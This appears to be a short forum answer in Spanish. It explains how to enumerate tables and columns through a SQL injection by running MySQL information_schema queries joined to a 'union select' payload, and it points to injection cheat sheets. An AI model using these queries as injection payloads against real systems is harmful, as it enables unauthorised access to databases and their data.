Revisa tu propio enlace publicado. Tiene una sección donde describe en detalle lo que está pidiendo. Con alguna modificación, esto también debería ser aplicable a los nombres de columna.
buscar nombres de tablas
Visite la siguiente página web cheatsheet de sql-injection que debería dar suficientes ideas sobre cómo lograr qué Estás buscando.
Este es un ejemplo de la base de datos de MySQL (deberá combinarlos con su carga útil, por ejemplo, 'union select ... y 1 =' 1 o similar):
Listar columnas:
SELECT table_schema, table_name, column_name FROM
information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema !=
‘information_schema’
Listar tablas:
SELECT table_schema,table_name FROM information_schema.tables
WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Solo google para sql-injection + cheatsheet + enumeration. Eso debería darte mucha información adicional.